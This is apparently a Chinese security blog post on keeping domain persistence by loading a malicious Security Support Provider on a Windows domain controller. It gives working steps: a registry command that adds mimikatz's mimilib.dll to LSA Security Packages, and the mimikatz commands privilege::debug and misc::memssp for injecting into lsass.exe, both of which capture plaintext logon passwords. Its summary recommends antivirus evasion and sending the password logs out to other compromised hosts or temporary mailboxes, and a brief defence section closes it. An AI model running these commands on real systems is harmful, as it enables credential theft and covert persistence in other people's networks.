点击上方蓝字关注我们
0x00 测试环境
域控服务器:Win-2008DC—10.10.10.30
域:god.com
0x01 前言
SSP即Security Support Provider(安全支持提供者)是一个用于实现身份验证的DLL文件,主要用于Windows操作系统的身份认证功能。
当操作系统启动时SSP会被加载到lsass.exe进程中,由于lsass可通过注册表进行扩展,导致了在操作系统启动时,可以加载一个自定义的dll,来实现想要执行的操作。
当我们在域环境内对LSA进行拓展自定义DLL文件时,就能够获取到lsass.exe进程中的明文密码,即使修改密码重新登陆,我们依旧可以获得密码,达到域权限维持的效果。
0x02 利用
方法一、修改注册表扩展功能
1、首先将mimikatz中的 mimilib.dll 传到目标域控的c:windowssystem32目录下,使用dll的位数与目标操作系统保持一致。
2、修改注册表,在键值Security Packages下添加 mimilib.dll,系统重启后会记录登陆密码。
reg query HKLMSystemCurrentControlSetControlLsa /v "Security Package"
reg add "HKLMSystemCurrentControlSetControlLsa" /v "Security Packages" /d "kerberos msv1_0 schannel wdigest tspkg pku2u mimilib" /t REG_MULTI_SZ
修改成功后的注册表如下图所示:
3、重启目标系统,重启后有用户登陆到当前系统,会在c:windowssystem32目录下生成一个记录登陆账号密码的kiwissp.log文件。
方法二、进程注入lsass.exe
1、使用mimikatz对lsass.exe进程注入,会在C:WindowsSystem32生成一个mimilsa.log日志文件,里面包含当前登陆的明文密码。
privilege::debug
misc::memssp
0x03 总结
攻防实战中,靶机很难会重启,攻击者重启的话风险过大,因此可以在靶机上把两个方法相互结合起来使用效果比较好,前提需要做好免杀,并且可以尝试利用把生成的日志密码文件发送到其他内网被控机器或者临时邮箱。
0x04 防御
对于两种方法的详细分析,在防御策略上也要根据攻击步骤进行防御:首先检查注册表中HKLMSystemCurrentControlSetControlLsaSecurity Packages项中是否含有可疑的DLL文件、再检查C:WindowsSystem32目录下是否存在可疑的DLL文件,最后可以使用第三方的工具来查看LSA中是否存在可疑DLL文件。
长按关注
灼剑(Tsojan)安全团队
点个在看你最好看
本文始发于微信公众号(哈拉少安全小队):域渗透|域权限维持之SSP
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论